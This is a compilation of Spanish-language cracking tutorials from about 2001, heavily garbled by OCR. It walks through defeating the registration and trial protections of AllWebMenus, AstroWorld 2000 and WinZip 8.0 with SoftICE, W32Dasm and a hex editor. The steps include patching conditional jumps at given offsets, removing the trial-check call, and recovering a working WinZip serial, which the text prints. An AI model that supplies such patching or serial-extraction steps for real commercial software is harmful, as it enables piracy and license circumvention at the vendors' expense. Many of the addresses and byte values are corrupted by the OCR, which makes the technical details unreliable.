0167:00448CB6 52 PUSH EDX 

0167:00448CB7 FF15C8D34A00 CALL [USER32 !MessageBoxA] 

0167:00448CBD  33C0 XOR EAX,EAX  CAEMOS AQUI 

0167:00448CBF  5F POP EDI 


bueno amigos cuando damos F12 una sola vez caemos en la direccion de memoria 00448CBD ok una vez ahi suvimos diez 
lineas y podemos ver una CALL seguido de TEST mmmmm... interesate , vamos y borramos todos los break Points y ponemos uno nuevo 


en 00448C93 y damos CONTROL D e insertamos un numero y nombre falso y damos click en OK y saltamos 
directamente a esa direccion de memoria damos una sola vez F10 y caemos en 00448C98 y damos D EDX y hechamos 
un vistazo a la ventana de datos, nos aparecen unos numeros extraños 532110808 OK!!!! los apuntamos en un papel y 


IrfanView 


nO0TAS 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y 
cometo errores, si encuentras uno házmelo saber OK. PROFESOR _X 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 
+ [DeK_OiN ] 
e. Act MAgO 
e. ¡TeD 
e SIR DREAM 
e POTHEAD 
e VluGo 
e CrKViz 
e Txeli 
e Kuato_Thor 
+ CODE_MEX 
e Metamorfer 
e Txotxo 
e Raziel 
e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers. ws 


Viper ( creador de file insPEctor ) file insPEctor web site http:/ / www.finspec. swsites. net/ index. htm 


Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


Allwebmenus V1.2 


Name / Serial 


Buscar un serial valido 


Principiante 

http://www.Likno.com 

Softice, W32dsm89 , Regmonitor , Editor Hex. 

SiLvEr StOrM FECHA: 


INTRODUCCION 


15/04/2001 


Hola de nuevo, despues de varios dias sin hacer un tut aqui les va otro ..aqui vamos de nuevo pero esta vez 
vamos a parchar el prerama para que el mismo nos de el serial.. Jejej fijense el mismo programa se va 
registrar solito.. que tonto ..ya son 11 tutoriales gracias a todos Uds...(por tener paciencia de leerelos), espero 


que lo entiendan y les sea util. Recuerden que este tutorial esta hecho con fines netamente educativos 
si les interesa este Programa COMPRENLO. 


AL ATAKE 
Comentario del Programa 
e El programa que vamos a registrar les genera menus para intrucirlos en un html file. 
Objetivos 
1. Simular registrarse 
Manos a la Obra 


Primero instalamos nuestro programa , luego lo revisamos con File Inspector, este lo omito los detalles pues en todos los tutoriales anteriores lo hemos hecho, creo 
que ya no necesito decirlo de nuevo. lo unico que debemos saber es que esta hecho en Visual Basic. podriamos intentar buscar el serial con Numega smartcheck, pero 
esta vez no lo haremos, pues lo parchearemos. 


Ok... jeje aqui comienza la aventura. 


Abrimos nuestro Objetivo... y . tratamos de registrarlo. nada nuevo.. Help.. Register..etc... 


El programa nos da un error cuando ponemos cualquier numero... The password......... etcetcectect. 

ok. abrimos W32dsm89 y buscamos nuestro objetivo. 

Recuerden de hacer una copia del executable.... y trabajar sobre la copia a la hora de hacer las modificaciones. 
Luego buscamos el string "The password...." 


veremos algo asi: 


 URSoft 3 181 xi 


* Possible StringData Ref from Code 0b3j -> 
=>"correct" 


:DOS330BE 89758C mov dword ptr [ebp-7?4], esi 
:005330C1 FFD? call edi 
00533003 8D459C lea eax, dword ptr [ebp-64] 
:DO5330C6 S8D4DAC lea ecx, dword ptr [ebp-54] 
:D0O5330C9 50 push eax 


o 32D asm List of String Data lt 
A OBOShEr asm List of String Data ltems ml ES 


:DOS330CE To Search Disassembly for String Data, Double Click on Text Cancel Search 
:D005330CF 

: 005330D2 "The menu was successfully inserted " 

: DO5330D4 "The name '"' 


"The new stule has been successfully * 
"The password vou entered is not " 
"The Style Name can not contain * 


* Peferer 


:D05330D£ [Then place it in the same directory ” 
-D05330DE |'This command will delete the selected " 
-005330Dg | This copy has already been registered" 
-005330E1 "This file is not a valid * 
A Y, LIPOFDA Y Test” 
- DOS330E£ “Title BG Color" 
- OOS330K€ “Title Border Color” 
-DOS330ES Title Border Style 
” ? Title Border Width" 
: DOS330E2 [Title Content Alignment" — 
:DOSSSODEE 1 "Title Image Alignment'" 

"Title Image" há 
* Peferer 

Close | Copy áill | Copy View | 

:005330ELr 
:D005330F3 830414 add esp, 00000014 
:005330F6 E9B29000000 jmp 005331B4 


LL 


Al] 
'Line:524005 Pg 8001 of 8118 Code Data (2:005330B7 ¡Offset 0013308 7h in File:Allw'ebMenus. exe 


:005330F3 830414 add esp, 00000014 al 
:005330F6 ESB9000000 jmp 005331B4 > 


41] , 


Line:524005 Pg 8001 of 8118 Code Data (2:005330B7 (MOffset 0013308 7h in File:A4Il'ebMenus.exe 


Subimos un poco en el codigo .. 
Aquí el programa ya viene con el error de codigo.. Seguimos todas las referencias.. vemos que mas arriba hay un JNE ... 


esto es interesante verdad?..Asi que lo primero que hacemos es cambiar esta instrucción a si no es igual no ejecute osea de 736d 
Cambiamos a 746d para decirle que salte a la direccion 5330fb . 


Para cambiar esto usamos un editor hexadecimal.. recuerden que para ver el offset deben ver en la parte de debajo de w32dasm donde dice 
COoffset 0013308C ... la h no se toma en cuenta pues quiere decir que el numero esta en hexadecimal 


Ejecutamos el REGMONITOR para ver que pasa con el registro. y luego nuestrop programa modificado... 
Intentamos Registrarlo y si, cuando metemos cualquier numero el programa nos da las gracias por registrarlo.. 


Pensamos que eso estodo, pero lamentablemente cuando vemos en about nos dice unregistered copy.. JEjej la cosa no era tan facil pero bueno 
seguimos viendo. lo interesante de este paso es que el programa crea las claves dentro del registro de windows. 


Si cuando le damos enter al crear la clave, no vamos aregmonitor.y analizamos vemos que el programa crea las claves dentro del registro. 
Estas claves las vamos a utilizar mas tarde, pues sabemos que son falsas. 


£% Registry Monitor - Systems Internals: http: ¿/www.sysinternals.com e - E [xj 
File Edit Options Help 


E EOI de 
tt | TJfAequet [Pahñ______________——|fesut fome _ |] ____ «] 


156 ... LO0penKey HKCUN Softwares Microsoftw'indowsCurentersioni Internet Settings Zones+0 SUCCE... Hey: OxC4... 
157 .. Query alue... HKCUNSoftwarerMicrosoftw'indowsCurrentersioni Internet Settings Zones+01400 SUCCE... 0x0 
158 . Elloseke HKCUA Softwares MicrosoftWwindowsCurrentersion, Internet SettingsiZonesvl SUCCE... 
159 .. [CreateKep HKCUASoftwareYWB and YBA Program Settings 5llw'ebMenus!Settings SULCCE... he 
160 . CSetvalueEx ¿CU Software vB and WBA Program Settings 4 ll 'ebMern tingspud SULEEZ 
6 .. EElosekKey HKCUNSoftwareWB and BA Program Settings. 4llwebMen ings SUCTE= 
.. COpenkKey HKECUA Software 'B and BA Program Settings Allw'ebMen ings APIEEE=: 
.. CQueryYalue... HKECUN Software WB and YBA, Program Settings AlW'ebMenus, Settings. awms SUELE: 
.. CQueryYalue... HKCUNSoftwareWWB and WBA Program Settings.4lM'ebkmMenus! Settings awms SUELES: 
.. [Query alue... HKCU VSoftu o 'B and BA Program Settin MWebMenusis settings ES SULEEE:.: 
.. EClosekey CUA SoftwareWB and Y BA Program Sett A'ebl ttings SUCCESS 
En [OpenkKey Ft ¿B and BA Pro ogram Settings A /1fwebl | gs SUCCE.. hkKey: OxC4A... 
.. Query alue... HKCUNSoftw “B and VBA Prograrn k gs Mainwéidth DULCES 
ze [Query falue... ¿CU Software vB and WBA Program S tings 4Mainéidth SULCE 3630/39 
e... HKCUAS oftwarev'B and WBA Program S pci AlwWebMer as imainwéidth SUCTE-. j 
HKCUNSoftwareWB and BA Program Settings. á4llwebMen gs SUCTE:.- 
HKCU Software B and WBA Program Settings A llw'ebmMenus!Settings SUCCE... hey: OxC4... 
E Ducati. HKCUA Software WB and WBA, Program Settings. 4 /lM'ebMenus! Settings, M ainHeight SEE 
.. [Query alue... HKCUN Software WB and WBA Program Settings.á/ll'ebkmMenus!Settings+M ainHeight SULCE3b 30 303 
. Quer alue... HKCU IS oftv at and A VBA Program Settings vAlWwebMenus! eli endo SUECE: 00 
.. Ellosekey gs SUECRE 
.. LO0penkKey £CUAS e Y and VBA Program Seltings! W Men ings SUCCE... hey: OxC4... 
. Quer alue... HKCUAS oftware' 08 and WBA, Program Settings 4 'ebMern s'pi QULEES 
. CQuerYalue... HE AS aid and YBA4, Program Settinas5lhwebMen as'pi SUCCE... 54 55 44 45... 
.. EQueryYalue... E a Ni ) and VBA Program ielcóa refe tingsrpid SUCEE--MUDEEBE:. 
.. EOloseKey tings SPIECES 
.. EDpenkKey HKCU' pea VB and VBA Program Sellos VAIM/ebMenus! Settings SUCCE... hey: 0xC4... 
. Quer alue... HKCUASoftwareYWB and YBA Program Settings 5ll'ebMenus! Settings pwd SUELES 
> [QueryYalue... HKCUN Soft vareWWB and YBA Program Settings AlhéebmMenus!Settings'pw QUES 
alue... HKCUNSoftwareWW WBA Program Settings Allwebh settings Apu SUCCE... 


SE 


ua] mn] Dm] a] 0 09 —y “ 


bl bl bd bd od ob od 
a  — — 


10% e ) NOTFO.. 

1..L parks HKCUSS oftware «MicrosoftWindowsiCurreniVersion intemel SettingsZones0 SUCCE... Hey: OxC4... 

1... [Quer alue... HKCUAS oftwarerMicrosoftWlindowsCurentersioni Internet SettingsZones0111400 SULCCE... 0x0 

1... CCloseKey HKCUA Softwares Microsoftw'indowsCurentersioni Internet Settings Zones+0 SULCCE... 

1... COpenkKey HKCUN Softwares Microsoftw'indows:Curentersioni Internet Settings Zones+0 SUCCE... hey: OxC4... SE 
1 a AA A AA Ca EA Y AA SA AAA TIN AAA PATA RA A QIHIPFE Mañ 


Openkey Ñ HKCU 4S oftwaresM icrosoftWindowsCurrentVersionkintemet Settings Zones0 


k SUCCE... hKey: OxC4... 
1... CQueryYalue... HKCUN Softwares MicrosoftwW'indowsCurrentersioni Internet Settings Zones+01400 SUCCE... 0x0 
190 1... [ClosekKey HKEUA Software MicrosoftWwindowsCurrentersioni internet Settings Zones0 SUCCE... 
19 1... COpenkey HKCUNSoftware*Microsofttw'indows Current ersioni Internet SettingsZones+0 SUCCE... hKkey: 0xC4... 
10975 1 Prandi UVR EOsthsrah hdr A A A A A ATA E QUIPFEo Má 


A BusKar El Zeryal 


Ok . vamos a seguir traceando a ver por que nos da este eror. 
Se acuerdan que en el registro guardaba un string como este: 


SetValueEx HKCUWSoftwarelVB and VBA Program SettingslAllWebMenuslSettingsipwd SUCCESS "123456789" 

Vamos a buscar ese strin.. preguntan para que, pues bien.. la primera logica que se me ocurre es que cuando el sistema arranca o le das about 
el compara lo que hay dentro de ese strin contra la formula de generacion que tiene, si es igual pasa ,si no da que no esta registrado.. bueno 
vamos a tracear esta instrucion , primero la buscamos como ref. 


PWD 


¿2 URSoft W32D asm Yer 8.93 Program Disassembler/Debugger 


Disassembler Project Debug Search Goto Execute Text Functions HexData Refs Help 


* Possible StringData Ref from Code 0b3 ->"pud" 
| 
push 00411DFC 


:0048EA47 68FC1D4100 


O04S8EAAE SB4D90 
0048EAB1 894594 


mov ecx, dword ptr [ebp-70] 
mov dword ptr [ebp-6C], eax 


* Possible StringData Ref from Code 0b3j ->"Settings" 


0048EAB4 6sSC381D4100 
:004S5EAB9 394404 
:004S8EABC SB4DE4 
0048EABF 51 
0048EACO 894208 
0048EAC3 8B4598 
:0048EAC6 89420C 
:0048EAC9 FFD? 


| 

push 00411DC8 

mov dword ptr [edx+04], ecx 
mov ecx, dword ptr [ebp-1C] 
push ecx 

mov dword ptr [edx+08], eax 
mov eax, dword ptr [ebp-68] 
mov dword ptr [edx+0C], eax 
call edi 


* Reference To: MSVEBVM6O.  vbaStrMove, Ord: 0000h 


:004SEACB 8B359C124000 
:0048EAD]1 SEDO 
:0048EA4D3 B918705300 
0048EADS FFD6 
0048EA4DA SD4DE4 


| 

mov esi, dword ptr [0040129C] 
mov edx, eax 

mov ecx, 00537018 

call esi 

lea ecx, dword ptr [ebp-1C] 


* Reference To: MSVBVM6O. vbaFreeStr, Ord: 0000h 


:004S5EADD FF15D0124000 
004S85EAE3 SD4DpDC 


| 
Call dword ptr [004012D0] 
lea ecx, dword ptr [ebp-24] 


* Reference To: MSVBVME6O.  vbaFree0bj, Ord: 0000h 


0048EAE6 FF15CC124000 


4 


| 
Call dword ptr [004012CC] 


- o Men Me lr CONAPA A 


| Line:321822 Pg 4126 and 4127 of 8118 Code Data (2:0048£44C ¡Offset DOOSEAACH in File:AllwebMenus.exe 


| 
0048EAE6 FF15CC124000 Call dword ptr [004012CC] =— 
» 


ES AA AA di - o de Me de EAN AA 


4 
| Line:321822 Pg 4126 and 4127 of 8118 Code Data (2:0048£44C (AOffset OOOSEAACH in File:AllWwebMenus. exe 


JejSi buscamos hacia abajo .. no conseguimos ninguna call quiere decir que cualquier proceso se esta ejecutando ahí mismo, pero si seguimos 
bajando conseguimos un condicional... jeje si vemos encima de ese jne hace una referencia a visualbasic _vbastremp osea un string compare.. 
ok nos paramos sobre ella y le damos al boton de jump to. 

Por cierto el jnz que les comento esta en la linea.. :0048EB00 

Y caemos en el sitio de validacion. 

Seguimos bajando por el codigo y encontramos una Call en la linea :0048EEE1 .. esta call es donde el compara el codigo que genero para esta 
instalacion .. genera el bueno y se trae un valor 

Si seguimos bajando vemos como el programa empieza a hacer una serie de operaciones .. 

Seguimos bajando, vemos que no hay mas call, pero en la linea :0048EF45 hay otro condicional.. 

Jeje aquí si creo que es..... perfecto vamos a cambiarlo por jne 

Osea vamos a cambiar el string 0F8434040000 POR 0F8534400000 vieron que solo cambie el 84 por 85 el resto sigue igual... ahh.. El offset 
es SEF45 

Y probamos--- se acuerdan que ya en el registro esta la clave.. 

Entramos en nuestra version modivicada y nos vamos al about.. 


JEje Programa Registrado 


Jjeje que simpatico si Uds. Borran el contenido de pwd o el PID del registro y entran de nuevo el mismo se registra con otro password y pid 
diferente.. 
Tonto verdad... 


nO0TAS 


Cualquier error por favor pido disculpas, y si lo ven por favor me lo dicen, para corregirlo.. recuerden que soy humano y por lo tanto no soy 
perfecto.. (:-)) y no quiero serlo tampoco... 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking........ 


Saludos 


Profesor_x 
KuaTo 
TurboP 
Txotxo 
[DeK_OiN] 


e Toda la gente de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


SiLvEr StOrM 


SiLvEr_ StOrM_ 2001 Ehotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


Programa: AstroWorld 2000 v 4.1.0.1 (Spanish Edition) 
PROTECCION: Limitacion de tiempo € Nag Screen 
Objetivo: Quitar Tiempo Limite y Nag Screen 
Descripcion: 
Dificultad: Principiante 
DOWNLOAD: http://www.astroworld.com 
e Soft Ice 

" es e Hex Work Shop v 3.0 

PA e RVA Converter v 1.1 
CRACKER: Profesor_X FECHA: 15/04/2001 

INTRODUCCION 


otra vez .. jejeje ... con otro tuto más espero que les guste, le toca el banquillo de los acusados a la aplicación 
llamada Astroworld v 4.1.0.1 la cual sirve para poder crear tus cartas astrologicas ya sea actual o de cuando 
naciste, con estas cartas astrologicas podras saber si naciste para el cracking o no.. jejejjeje ... 


AL ATAKE 
Comentario del Programa 


e El Astroworld v 4.1.0.1 tiene muchisimas opciones para la creación de : 
1. Cartas astrologicas 
2. Cartas Planetarias 
3. Horoscopos 
4. etc. etc. 


la verdad es bueno este programa para los que gustan de estos temas, a mi no me gustan estos temas, pero ahi les va el 
tuto para los que esten interesados.... 


Objetivos 


1. Quitar el Tiempo Limite y la NAg Screen 


Manos a la Obra 


empezemos con el MEN] URGUE, lo primero que hacemos es analizar el programa para ver si esta empakado y en que lengueje fue 
hecho, para eso usamos el File Inspector v 4.2 y nos muestra lo siguiente: 


9, file insPEctor v3.5 - ViPÉ RIK-FoR] 


fo, a 
% 


como podemos ver no esta empakado y esta hecho en Visual C++ v 5.0, mmmm interesante, ahora lo siguiente sera analizar el 
programa ...lo ejecutamos y nos aparece una ventana como esta: 


MO, 


dá as 2000 


¿| | troWorld Int 


Pe 
Y) 
Á 


software astrológico 
para Microsoft Windows 


Terminado 


seguida de la ventana principal del programa ... jejejjeje ... como pueden ver nos muestra dos botones, si damos click en 
SIGUIENTE entramos al programa, ok! lo importante aqui es quitar ese tiempo limite y la NAg screen, para eso tenemos que hacer 
uso de nuestro querido y gran ponderado SOFTICE ok! lo primero que hacemos es ejecutar de nuevo el ASTROWORLD y dejamos 
que aparesca la ventana que nos avisa que se termino el periodo de prueba, una vez ahi vamos y damos CONTROL D el cual nos 
manda a el SICE y ponemos el comando TASK el cual nos mostrara la siguiente información : 


TaskName SS: SP StackTop StackBot StackLow TaskDB hHhQueue Events 


Ins90e0 * 0000:0000 00699000 006A0000 515E 313F 0000 


Seekrep 0000:0000 0064B000 00650000 519E 514F 0000 


Dreamwea 0000:0000 00C7A000  00C80000 121E 48F7 0000 
Dahelp 0000:0000  0056D000 00570000 4AD6 0000 0000 
Astrowor 0000:0000  0085C000 00860000 10F6 OFBF 0000 
Wmiexe 0000:0000  0056D000 00570000 22FE 0000 0000 
Msmsgs 0000:0000  006FB000 00700000 3416 231F 0000 
Winampa 0000:0000  0063E000 00640000 351E 3467 0000 
Flash32 0000:0000  00B3D000  00B40000 361E 3537 0000 
Avgecc32 0000:0000  0065B000 00660000 36C6 354F 0000 
Promon 0000:0000  0063E000 00640000 3776 36F7 0000 
Systray 0000:0000  0063D000 00640000 244E 373F 0000 
Taskmon 0000:0000  0063E000 00640000 2356 23DF 0000 


despues de eso podemos ver que encontramos en ejecución el ASTROWORLD, despues de eso seguimos en el SOFT ICE y 
damos el comando: 


HWND ASTROWOR 


y nos aparece lo siguiente: 


0698 (1) OFBF 32 ASTROWORL 132770 (Dialog) 13D7:00000B38 
069€ (2) OFBF 32 ASTROWORL Edit 13D7:00000B38 
06A0 (2) OFBF 32 ASTROWORL Edit 13D7:00000B38 
06A4 (2) OFBF 32 ASTROWORL Button 13D7:00000B38 
06A8 (2) OFBF 32 ASTROWORL Button 13D7:00000B38 
06AC (2) OFBF 32 ASTROWORL Button 13D7:00000B38 
06B0 (2) OFBF 32 ASTROWORL Button 13D7:00000B38 
06B4 (2) OFBF 32 ASTROWORL Static 13D7:00000B38 
06B8 (2) OFBF 32 ASTROWORL Static 13D7:00000B38 


ya sabemos ahora cual es el HANDLE de la ventana del astroworld que es 0698 , ahora seguimos en el softice y ponemos 


BMSG 0698 WM_DESTROY 


y damos enter , despues damos control d y salimos del SOFTICE y ahora si damos click en el boton de SIGUIENTE y 

saltamos directamente al SOFTICE en el cual damos F12 varias veces hasta caer en el codigo del ASTROWORLD al caer en 
el codigo , empesamos a dar F10 hasta pasar dos RET y inmediatamente que pasamos el segundo RET caemos en la siguiente 
parte del codigo: 


0167: 


0167: 


0167: 


0167: 


0167: 


0167: 


00411EC9 


00411ECD 


00411ED3 


00411ED8 


00411EDB 


00411EDD 


Cc645FCco1 MOV 
8D8DDOFCFFEFF LEA 
E8065B1000 CALL 
83F803 CMP 
7533 JNZ 


C785ECF9FFFFO3000000MOV 


BYTE PTR [EBP-04],01 


ECX, [EBP-0330] 


005179DE 

EAX,03  <--———caemos aqui 

00411F10 

DWORD PTR [EBP+FFFFF9EC],00000003 


bueno amigos creo que esta super claro, despues del segundo ret, caemos una linea abajo de la call que genera la ventana y 
hace la comprobación del time, jejeee, ahora lo que tenemos que hacer es eliminar esa CALL en la dirección de memoria 
411ED3 , ok entonces abrimos el ejecutable del ASTROWORLD en el editor hexadecimal y ahora tenemos que sacar su 
offset de esa direccion de memoria, como lo hacemos bueno pues muy facil para no estar esperando a que se desensamble , 
vamos y usamos la grandiosa herramienta hecha por LaZaRuS el RVA Converter v 1.1 en el cual en el menu de file 
seleccionamos LOAD y cargamos el ejecutable del ASTROWORLD y ponemos como aparece en la ventana : 


¡RAVA Converter 


en la opcion de RVA ponemos la direccion de memoria en la cual se encuentra esa call y nos da como offset 11ED3, una vez 
con el offsett vamos al editor hezadecimal y vamos a ese offset y cambiamos: 


por 


J0011EC8 
J30011ED6 | 


DOC6 45FC 018D 8DDO FCFF F 
83F8 0375 3307 8S5EC F9FF FFO3 m . se .onoaos 


M1 AERRA ANA NAFPE AER ANÑAN Ann EFEE FEFA 


nO0TAS 


ESPERO les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y cometo 
errores, si encuentras uno házmelo saber OK. PROFESOR_X 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 


e [DeK_0iN ] 

e Act MAg0 (nEw tNt crAK tetAM mEMBER) cCONGRATULATIONS!!! 
e Txeli 

e Kuato_Thor 

e Txotxo 

e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www. tntcrackers.ws 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean muchos 
tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 
Programa: Winzip v8.0 (3105) 


PROTECCION: Serial 

Objetivo: Encontrar un Serial Valido 

Descripcion: 

Dificultad: Principiante 

DOWNLOAD : http://www.any on internet 

Herramientas: Softice v3x 

CRACKER: SiLvEr StOrM FECHA: 15/04/2001 


INTRODUCCION 


JeJe como siempre esto de hacer tutoriales es entretenido, aunque mas divertido es entender los diferentes 
esquemas de generacion de claves que usan las casas de software, Aqui vamos de nuevo con otro tutorial , 
sigo acendiendo, ya he alcanzado la suma de 9 tutoriales.. gracias a todos Uds...(por tener paciencia de 
leerwelos), espero que lo entiendan y les sea util. Recuerden que este tutorial esta hecho con fines 


netamente educativos si les interesa este Programa COMPRENLO. 


Por cierto muchas gracias a mi amigo KuaTo. 


AL ATAKErr 


Comentario del Programa 


e El programa que vamos a Busacr es un programa que creo que un 99% de los usuarios de computadoras usan o 
por lo menos los deberia usar.. es un compactador de archivo para generar archivos comprimidos (buenisimo) 


Objetivos 
1. Busacr el Serial Valido 
Manos a la Obra 


Primero instalamos nuestro programa y lo ejecutamos 


THANK YOU FOR TRYING WINZIP! 
This is a fully functional unregistered version for evaluation use only. 
The registered version does not display this notice. 


You can order the registered version online, by phone, or by mail. 
immediate online delivery is available from www. winzip.com. 


Wiew Evaluation License Enter Registration Code... 


l understand that | may use W'inZip only for evaluation 
purposes, subject to the terms of the Evaluation License, and 
that any other use requires payment of the registration fee. 


Presionamos Enter Registration Code... 


y veremos algo como esto: 


Register W'inZip XK] 


lf you paid the WinZip registration fee: 


If you paid the WinZip registration fee and received a registration number from WinZip 
Computing or an authorized reseller, please enter your name and registration number here 
EXACTLY as they appear in the instructions, or click "Help' for additional informatior. 


If you have not yet paid the WinZip registration fee: 


If you downloaded an evaluation version of W'inZip, or if you received this version ofWéinZip 
ona disk or CD, with a book, or with other hardware or software, and pou have not paid the 
WinZip registration fee, you are licensed to use WinZip for evaluation purposes only. Click 
"Continue Unregistered", or click "Help" for additional information. 


Name: SiLvwEr StOrhd 
Registration $: hr 23456789 


Cancel Continue Unregistered Help 


Llenamos los spacios con nuestros datos: en mi casolo pongo como ven en esta pantalla 
Prueben uds. con sus propios datos. 


Y presionamos Ok. 


WinZip 


O Incomplete or incorrect information. 


Ok.. Seguimos con nuetro infalible plan de conseguir el serial 


A BusKar El Zeryal 


Para la busqueda de serial Presionamos ACEPTAR y volvemos con los datos aneriores.. 


Antes de darle Ok -.------ Presionamos Control D y abrimos Softice (sice). Ponemos un Breakpiont en 
GETDLGITEMTEXTA y salimos de Sice con Control D. 


Presionamos Ok. 


Slce se abre... ESTA VEZ NO NOS IMPORTA LA PRIMERA VEZ PUES SOLO REVISA EL NOMBRE 


Presionamos Control D y SICE se cerrara y aparecera de nuevo aqui. 


015F:00407F8F CALL [USER32!GetDlgltemTextA] " 
015F:00407F95 PUSH ESTI ---—— ooo Caemos AQui.. 
015F:00407F96 CALL 0043F89A 

015F:00407F9B PUSH ESI 

015F:00407F9C CALL 0043F8C3 

015F:00407FA1 CMP BYTE PTR [0048CD78],00 
015F:00407FA8 POP ECX 

015F:00407FA9 POP ECX 

015F:00407FAA JZ 00408005 

015F:00407FAC CMP BYTE PTR [0048CDA4],00 


015F:00407FB3 JZ 00408005 


015F:00407FB5 CALL 004079D3 == ==-=--- ESTA CALL ES EL IMPORTANTE .. AQUI GENERA EL 
CODE 

015F:00407FBA TEST EAX,EAX == COMPARA EL CODIGO... 

015F:00407FBC JZ 004080053 ----------=-==---- SALTA SINO ES IGUAL ..... 

015F:00407FBE PUSH EDI 


015F:00407FBF MOV EDI,0047FFA4 


Ok.. Desabilitamos TODOS los BREAKPIONTS... escribimos BC * 


Y ponemos uno en ESA CALL. 
escribimos BPX 004079D5 

Y salimos de Sice --Control D 
Datos Iguales y Presionamos OK. 


Sice Abre de nuevo.. 


015F:004079D2 RET 0004 

015F:004079D5 PUSH EBP === ooo====-- Caemos aqui... 
015F:004079D6 MOV EBP,ESP 

015F:004079D8 SUB ESP,00000208 
015F:004079DE PUSH EBX 

015F:004079DF PUSH ESI 

015F:004079E0 XOR ESLESI 

015F:004079E2 CMP BYTE PTR [0048CD78],00 
015F:004079E9 PUSH EDI 

015F:004079EA JZ 00407A8A 

015F:004079F0 LEA EAX,[EBP-14] v 


015F:004079F3 PUSH EAX <> v 


Presionamos 58 veces F10 hasta caer aqui. 


0167:0079F2E8 43 36 30 31 31 36 45 30-00 01 00 00 00 00 56 FS C60116EO0......V.2 
0167:0079F2F8 01 00 02 00 0B 00 EA 82-17 23 42 00 46 163C0A ......... AB.F<A 
0167:0079F308 00 00 28 83 A3 0E 7F 04-00 00 09 00 00 00 09 00 ..(...82127;......... 
0167:0079F318 02 00 90 01 02 00 47 11-38 83 17 0C 57 17 BC 01 ......G.8...W... 
0167:0079F328 C1 01 38 83 1E 0C 57 17-0E 01 90 01 0B 00 17 27 ..8...W........ 
0167:0079F338 5A 83 El 28 01 00 00 00-5F 22 0B 00 9001 1C 58 Z..(...._".....Xv 
0167:0079F348 67 01 00 00 00 00 02 00-64 F3 4F 4B 1C 58 02.00 g.......d.OK.X..v 
A PROT32- 
015F:00407A9E MOV ESI,0048CDA4 " 

015F:00407AA3 LEA EAX.[EBP-0140] " 


015F:00407AA9 PUSH ESI 


> Nuestro Serial Valido 


015F:00407AAA PUSH EAX > Aqui Adentro Encerraron NUESTRO SERIALVALIDO ... ? eax 


015F:00407AAB CALL 004692D0 
015F:00407AB0 ADD ESP,10 
015F:00407AB3 NEG EAX 
015F:00407AB5 SBB EAX,EAX 
015F:00407AB7 INC EAX 
015F:00407AB8 MOV [00489FDC],EAX 
015F:00407ABD JNZ 00407B27 v 


015F:00407ABF LEA EAX,[EBP-0140] < > v 


Caundo estemos sobre esta linea tipeamos ? eax y anotamos ese numerito que aparece.. 
Borramos los bp ... bc * 

y Control D para salir de Sice. 

Ponemos el numerito que conseguimos.. y listo Programa Registrado. 


Reaistration Information 


SiLwEr StOrb 
C60116E0 


Press OK to confirm that this is pour correct registration information and 
that you have obtained it from WinZip Computing, Inc. or an authorized 
reseller. Otherwise press Retry or Cancel. 


Retry Cancel | 


nO0TAS 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking........ 


Saludos 


Profesor_x 
KuaTo 
TurboP 
Txotxo 


e Toda la gente de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


SiLvEr StOrM 


SiLvEr_StOrM_2001 Ohotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


22 Planta... Cosmética y maquillaje :0) 


PROTECCION: Name / Serial, Limitacion de Tiempo 
Objetivo: Simular estar registrados 
Dificultad: Novato 
. SoftlIce, file insPEctor, Proc Dump, W32dasm, Editor Hexadecimal, 
Herramientas: 
eXeScope, Resource Hacker 
CRACKER: Caos reptante FECHA: 20/03/2001 
INTRODUCCION 


Este es mi cuarto tutorial, y si alguien ha leído los tres anteriores, se habrá dado cuenta de que mi manera 
preferida de crackear un programa es obtener el serial number que nos permita registrarnos, o, si es posible, 
elaborar un generador de números de serie. Esto es muy limpio, ya que así evitamos manipular el programa 
original y además tiene la ventaja de que, con un poco de suerte, el número nos va a servir para registrar 
alguna versión posterior del programa. Por el contrario, si parcheamos por ejemplo la versión 1.0 de un 
programa, lo más seguro es que si aparece la versión 1.01, el parche ya no nos sirva. Sin embargo, muchas 
veces, bien porque es demasiado complicado obtener el número de registro, o bien porque el registro no se 
hace a base de entrar un número, nos vemos obligados a parchear el programa para que se comporte como 
si realmente estuviera registrado a nuestro nombre. Á eso me refiero al hablar de "cosmética y maquillaje" 
:0) Ahora vamos a ver tres ejemplos de lo que se puede hacer en estos casos. Estos programas han sido 
